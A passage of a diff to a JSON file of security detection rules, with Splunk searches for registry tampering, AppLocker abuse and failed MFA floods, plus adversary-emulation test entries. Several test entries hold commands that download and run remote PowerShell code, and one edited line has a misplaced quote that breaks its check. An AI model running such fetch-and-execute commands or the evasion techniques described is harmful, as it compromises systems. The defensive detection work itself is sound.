\"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\DisableCMD\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_cmd_application_filter`", "tags": { "name": "Disabling CMD Application", "analytic_story": [ @@ -504006,7 +509582,7 @@ { "name": "Disabling ControlPanel", "description": "this search is to identify registry modification to disable control panel window. This technique is commonly seen in malware to prevent their artifacts , persistence removed on the infected machine.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoControlPanel\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_controlpanel_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoControlPanel\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_controlpanel_filter`", "tags": { "name": "Disabling ControlPanel", "analytic_story": [ @@ -504121,7 +509697,7 @@ { "name": "Disabling Defender Services", "description": "This particular behavior is typically executed when an adversaries or malware gains access to an endpoint and beings to perform execution and to evade detections. Usually, a batch (.bat) will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. Endpoint should be isolated.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\System\\\\CurrentControlSet\\\\Services\\\\*\" AND (Registry.registry_path IN(\"*WdBoot*\", \"*WdFilter*\", \"*WdNisDrv*\", \"*WdNisSvc*\",\"*WinDefend*\", \"*SecurityHealthService*\")) AND Registry.registry_value_name = Start Registry.registry_value_data = 0x00000004) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_defender_services_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\System\\\\CurrentControlSet\\\\Services\\\\*\" AND (Registry.registry_path IN(\"*WdBoot*\", \"*WdFilter*\", \"*WdNisDrv*\", \"*WdNisSvc*\",\"*WinDefend*\", \"*SecurityHealthService*\")) AND Registry.registry_value_name = Start Registry.registry_value_data = 0x00000004) BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_defender_services_filter`", "tags": { "name": "Disabling Defender Services", "analytic_story": [ @@ -504292,7 +509868,7 @@ { "name": "Disabling FolderOptions Windows Feature", "description": "This search is to identify registry modification to disable folder options feature of windows to show hidden files, file extension and etc. This technique used by malware in combination if disabling show hidden files feature to hide their files and also to hide the file extension to lure the user base on file icons or fake file extensions.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFolderOptions\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_folderoptions_windows_feature_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFolderOptions\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_folderoptions_windows_feature_filter`", "tags": { "name": "Disabling FolderOptions Windows Feature", "analytic_story": [ @@ -504377,7 +509953,7 @@ { "name": "Disabling NoRun Windows App", "description": "This search is to identify modification of registry to disable run application in window start menu. this application is known to be a helpful shortcut to windows OS user to run known application and also to execute some reg or batch script. This technique is used malware to make cleaning of its infection more harder by preventing known application run easily through run shortcut.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoRun\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_norun_windows_app_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoRun\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_norun_windows_app_filter`", "tags": { "name": "Disabling NoRun Windows App", "analytic_story": [ @@ -504492,7 +510068,7 @@ { "name": "Disabling Task Manager", "description": "This search is to identifies modification of registry to disable the task manager of windows operating system. this event or technique are commonly seen in malware such as RAT, Trojan, TrojanSpy or worm to prevent the user to terminate their process.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableTaskMgr\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_task_manager_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableTaskMgr\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_task_manager_filter`", "tags": { "name": "Disabling Task Manager", "analytic_story": [ @@ -504757,13 +510333,14 @@ { "name": "Hide User Account From Sign-In Screen", "description": "This analytic identifies a suspicious registry modification to hide a user account on the Windows Login screen. This technique was seen in some tradecraft where the adversary will create a hidden user account with Admin privileges in login screen to avoid noticing by the user that they already compromise and to persist on that said machine.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\Userlist*\" AND Registry.registry_value_data = \"0x00000000\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `hide_user_account_from_sign_in_screen_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\Userlist*\" AND Registry.registry_value_data = \"0x00000000\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `hide_user_account_from_sign_in_screen_filter`", "tags": { "name": "Hide User Account From Sign-In Screen", "analytic_story": [ "XMRig", "Windows Registry Abuse", - "Azorult" + "Azorult", + "Warzone RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -505107,7 +510684,8 @@ "Remcos", "Windows Defense Evasion Tactics", "Data Destruction", - "WhisperGate" + "WhisperGate", + "Warzone RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -505415,14 +510993,15 @@ { "name": "Windows Defender Exclusion Registry Entry", "description": "This analytic will detect a suspicious process that modify a registry related to windows defender exclusion feature. This registry is abused by adversaries, malware author and red teams to bypassed Windows Defender Anti-Virus product by excluding folder path, file path, process, extensions and etc. from its real time or schedule scan to execute their malicious code. This is a good indicator for a defense evasion and to look further for events after this behavior.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\*\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_defender_exclusion_registry_entry_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\*\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_defender_exclusion_registry_entry_filter`", "tags": { "name": "Windows Defender Exclusion Registry Entry", "analytic_story": [ "Remcos", "Windows Defense Evasion Tactics", "Azorult", - "Qakbot" + "Qakbot", + "Warzone RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -505431,7 +511010,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "exclusion registry $registry_path$ modified or added on $dest$", + "message": "Exclusion registry $registry_path$ modified or added on $dest$ for Windows Defender", "mitre_attack_id": [ "T1562.001", "T1562" @@ -506307,7 +511886,7 @@ { "name": "Windows Powershell Import Applocker Policy", "description": "The following analytic is to identify the imports of Windows PowerShell Applocker commandlets. This technique was seen in Azorult malware where it drops an xml Applocker policy that will deny several AV product and then loaded using PowerShell Applocker commandlet.", - "search": "`powershell` EventCode=4104 ScriptBlockText=\"*Import-Module Applocker*\" ScriptBlockText=\"*Set-AppLockerPolicy *\" ScriptBlockText=\"* -XMLPolicy *\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_powershell_import_applocker_policy_filter`", + "search": "`powershell` EventCode=4104 ScriptBlockText=\"*Import-Module Applocker*\" ScriptBlockText=\"*Set-AppLockerPolicy *\" ScriptBlockText=\"* -XMLPolicy *\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_powershell_import_applocker_policy_filter`", "tags": { "name": "Windows Powershell Import Applocker Policy", "analytic_story": [ @@ -506321,7 +511900,7 @@ "Installation", "Exploitation" ], - "message": "A PowerShell script contains Import Applocker Policy command $ScriptBlockText$ with EventCode $EventCode$ in host $Computer$", + "message": "A PowerShell script contains Import Applocker Policy command $ScriptBlockText$ with EventCode $EventCode$ on host $dest$", "mitre_attack_id": [ "T1059.001", "T1059", @@ -506333,14 +511912,14 @@ ], "observable": [ { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -507910,8 +513489,8 @@ "dependencies": [ { "description": "Named pipe executors must exist on disk\n", - "prereq_command": "if ((Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_server.exe)) {exit 0} else {exit 1}\n", - "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1\" -UseBasicParsing)\n$zipUrl = \"https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip\"\nInvoke-FetchFromZip $zipUrl \"*.exe\" \"PathToAtomicsFolder\\..\\ExternalPayloads\"\n" + "prereq_command": "if ((Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_executor.exe\") -and (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_client.exe\") -and (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_server.exe\")) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction ignore -Force | Out-Null\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1\" -UseBasicParsing)\n$zipUrl = \"https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip\"\nInvoke-FetchFromZip $zipUrl \"*.exe\" \"PathToAtomicsFolder\\..\\ExternalPayloads\"\n" } ], "executor": { @@ -507930,8 +513509,8 @@ "dependencies": [ { "description": "Named pipe executors must exist on disk\n", - "prereq_command": "if ((Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_server.exe)) {exit 0} else {exit 1}\n", - "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1\" -UseBasicParsing)\n$zipUrl = \"https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip\"\nInvoke-FetchFromZip $zipUrl \"*.exe\" \"PathToAtomicsFolder\\..\\ExternalPayloads\"\n" + "prereq_command": "if ((Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_executor.exe\") -and (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_client.exe\") -and (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_server.exe\")) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction ignore -Force | Out-Null\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1\" -UseBasicParsing)\n$zipUrl = \"https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip\"\nInvoke-FetchFromZip $zipUrl \"*.exe\" \"PathToAtomicsFolder\\..\\ExternalPayloads\"\n" } ], "executor": { @@ -507950,8 +513529,8 @@ "dependencies": [ { "description": "Named pipe executors must exist on disk\n", - "prereq_command": "if ((Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_server.exe)) {exit 0} else {exit 1}\n", - "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1\" -UseBasicParsing)\n$zipUrl = \"https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip\"\nInvoke-FetchFromZip $zipUrl \"*.exe\" \"PathToAtomicsFolder\\..\\ExternalPayloads\"\n" + "prereq_command": "if ((Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_executor.exe\") -and (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_client.exe\") -and (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_server.exe\")) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction ignore -Force | Out-Null\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1\" -UseBasicParsing)\n$zipUrl = \"https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip\"\nInvoke-FetchFromZip $zipUrl \"*.exe\" \"PathToAtomicsFolder\\..\\ExternalPayloads\"\n" } ], "executor": { @@ -507970,8 +513549,8 @@ "dependencies": [ { "description": "Named pipe executors must exist on disk\n", - "prereq_command": "if ((Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_server.exe)) {exit 0} else {exit 1}\n", - "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1\" -UseBasicParsing)\n$zipUrl = \"https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip\"\nInvoke-FetchFromZip $zipUrl \"*.exe\" \"PathToAtomicsFolder\\..\\ExternalPayloads\"\n" + "prereq_command": "if ((Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_executor.exe\") -and (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_client.exe\") -and (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_server.exe\")) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction ignore -Force | Out-Null\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1\" -UseBasicParsing)\n$zipUrl = \"https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip\"\nInvoke-FetchFromZip $zipUrl \"*.exe\" \"PathToAtomicsFolder\\..\\ExternalPayloads\"\n" } ], "executor": { @@ -507990,8 +513569,8 @@ "dependencies": [ { "description": "Named pipe executors must exist on disk\n", - "prereq_command": "if ((Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_server.exe)) {exit 0} else {exit 1}\n", - "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1\" -UseBasicParsing)\n$zipUrl = \"https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip\"\nInvoke-FetchFromZip $zipUrl \"*.exe\" \"PathToAtomicsFolder\\..\\ExternalPayloads\"\n" + "prereq_command": "if ((Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_executor.exe\") -and (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_client.exe\") -and (\"Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\build\\namedpipes_server.exe\")) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction ignore -Force | Out-Null\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1\" -UseBasicParsing)\n$zipUrl = \"https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip\"\nInvoke-FetchFromZip $zipUrl \"*.exe\" \"PathToAtomicsFolder\\..\\ExternalPayloads\"\n" } ], "executor": { @@ -516224,7 +521803,7 @@ { "name": "Azure AD Authentication Failed During MFA Challenge", "description": "The following analytic identifies an authentication attempt event against an Azure AD tenant that fails during the Multi Factor Authentication challenge. Error Code 500121 represents a failed attempt to authenticate using a second factor. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled. ", - "search": " `azuread` body.category=SignInLogs body.properties.status.errorCode=500121 | rename body.properties.* as * | stats values(userPrincipalName) by _time, ipAddress, status.additionalDetails, appDisplayName, userAgent | `azure_ad_authentication_failed_during_mfa_challenge_filter`", + "search": " `azuread` category=SignInLogs properties.status.errorCode=500121 | rename properties.* as * | stats values(userPrincipalName) as userPrincipalName by _time, ipAddress, status.additionalDetails, appDisplayName, userAgent | `azure_ad_authentication_failed_during_mfa_challenge_filter`", "tags": { "name": "Azure AD Authentication Failed During MFA Challenge", "analytic_story": [ @@ -516240,7 +521819,7 @@ "Delivery", "Installation" ], - "message": "User $body.properties.userPrincipalName$ failed to pass MFA challenge", + "message": "User $userPrincipalName$ failed to pass MFA challenge", "mitre_attack_id": [ "T1586", "T1586.003", @@ -516368,7 +521947,7 @@ { "name": "Azure AD Multiple Failed MFA Requests For User", "description": "The following analytic identifies multiple failed multi-factor authentication requests for a single user within an Azure AD tenant. Error Code 500121 represents a failed attempt to authenticate using a second factor. Specifically, the analytic triggers when more than 10 MFA user prompts fail within 10 minutes. Azure AD tenants can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others.", - "search": " `azuread` body.category=SignInLogs body.properties.status.errorCode=500121 | rename body.properties.* as * | bucket span=10m _time | stats dc(_raw) AS mfa_prompts values(userPrincipalName) by userPrincipalName, status.additionalDetails, appDisplayName, userAgent, _time | where mfa_prompts > 10 | `azure_ad_multiple_failed_mfa_requests_for_user_filter`", + "search": " `azuread` category=SignInLogs properties.status.errorCode=500121 | rename properties.* as * | bucket span=10m _time | stats dc(_raw) AS mfa_prompts values(ipAddress) as ipAddress by userPrincipalName, status.additionalDetails, appDisplayName, userAgent, _time | where mfa_prompts > 10 | `azure_ad_multiple_failed_mfa_requests_for_user_filter`", "tags": { "name": "Azure AD Multiple Failed MFA Requests For User", "analytic_story": [ @@ -516384,7 +521963,7 @@ "Delivery", "Installation" ], - "message": "Multiple Failed MFA requests for user $body.properties.userPrincipalName$", + "message": "Multiple Failed MFA requests for user $userPrincipalName$", "mitre_attack_id": [ "T1586", "T1586.003", @@ -516402,13 +521981,6 @@ "role": [ "Victim" ] - }, - { - "name": "ipAddress", - "type": "IP Address", - "role": [ - "Attacker" - ] } ], "risk_score": 54, @@ -516512,7 +522084,7 @@ { "name": "Azure AD Successful PowerShell Authentication", "description": "The following analytic identifies a successful authentication event against an Azure AD tenant using PowerShell commandlets. This behavior is not common for regular, non administrative users. After compromising an account in Azure AD, attackers and red teams alike will perform enumeration and discovery techniques. One method of executing these techniques is leveraging the native PowerShell modules.", - "search": " `azuread` body.category=SignInLogs body.properties.authenticationDetails{}.succeeded=true body.properties.appDisplayName=\"Azure Active Directory PowerShell\" | rename body.properties.* as * | stats values(userPrincipalName) by _time, ipAddress, appDisplayName, userAgent | `azure_ad_successful_powershell_authentication_filter`", + "search": " `azuread` category=SignInLogs properties.authenticationDetails{}.succeeded=true properties.appDisplayName=\"Microsoft Azure PowerShell\" | rename properties.* as * | stats values(userPrincipalName) as userPrincipalName by _time, ipAddress, appDisplayName, userAgent | `azure_ad_successful_powershell_authentication_filter`", "tags": { "name": "Azure AD Successful PowerShell Authentication", "analytic_story": [ @@ -516528,7 +522100,7 @@ "Delivery", "Installation" ], - "message": "Successful authentication for user $body.properties.userPrincipalName$ using PowerShell.", + "message": "Successful authentication for user $userPrincipalName$ using PowerShell.", "mitre_attack_id": [ "T1586", "T1586.003", @@ -516644,7 +522216,7 @@ { "name": "Azure AD Successful Single-Factor Authentication", "description": "The following analytic identifies a successful authentication event against Azure Active Directory for an account without Multi-Factor Authentication enabled. This could be evidence of a missconfiguration, a policy violation or an account take over attempt that should be investigated", - "search": " `azuread` body.category=SignInLogs body.properties.authenticationRequirement=singleFactorAuthentication body.properties.authenticationDetails{}.succeeded=true | rename body.properties.* as * | stats values(userPrincipalName) by _time, ipAddress, appDisplayName, authenticationRequirement | `azure_ad_successful_single_factor_authentication_filter`", + "search": " `azuread` category=SignInLogs properties.authenticationRequirement=singleFactorAuthentication properties.authenticationDetails{}.succeeded=true | rename properties.* as * | stats values(userPrincipalName) as userPrincipalName by _time, ipAddress, appDisplayName, authenticationRequirement | `azure_ad_successful_single_factor_authentication_filter`", "tags": { "name": "Azure AD Successful Single-Factor Authentication", "analytic_story": [ @@ -516660,7 +522232,7 @@ "Delivery", "Installation" ], - "message": "Successful authentication for user $body.properties.userPrincipalName$ without MFA", + "message": "Successful authentication for user $userPrincipalName$ without MFA", "mitre_attack_id": [ "T1586", "T1586.003", @@ -517099,7 +522671,7 @@ "Delivery", "Installation" ], - "message": "User $user$ is modifying an instance $dest$ for the first time.", + "message": "User $user$ is modifying an instance $object_id$ for the first time.", "mitre_attack_id": [ "T1078.004", "T1078" @@ -517114,13 +522686,6 @@ "role": [ "Attacker" ] - }, - { - "name": "dest", - "type": "Endpoint", - "role": [ - "Victim" - ] } ], "risk_score": 42, @@ -517233,7 +522798,7 @@ ] }, { - "name": "dest", + "name": "object", "type": "Endpoint", "role": [ "Victim" @@ -517829,7 +523394,7 @@ { "name": "GCP Multiple Failed MFA Requests For User", "description": "The following analytic identifies multiple failed multi-factor authentication requests for a single user within a Google Cloud Platform tenant. Specifically, the analytic triggers when 10 or more MFA user prompts fail within 5 minutes. Google CLoud tenants can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others.", - "search": " `gws_reports_login` event.name=login_failure `gws_login_mfa_methods` | bucket span=5m _time | stats dc(_raw) AS mfa_prompts values(user) by src_ip, login_challenge_method, _time | where mfa_prompts >= 10 | `gcp_multiple_failed_mfa_requests_for_user_filter`", + "search": "`gws_reports_login` event.name=login_failure `gws_login_mfa_methods` | bucket span=5m _time | stats dc(_raw) AS mfa_prompts values(user) AS user by src_ip, login_challenge_method, _time | where mfa_prompts >= 10 | `gcp_multiple_failed_mfa_requests_for_user_filter`", "tags": { "name": "GCP Multiple Failed MFA Requests For User", "analytic_story": [ @@ -517865,7 +523430,7 @@ ] }, { - 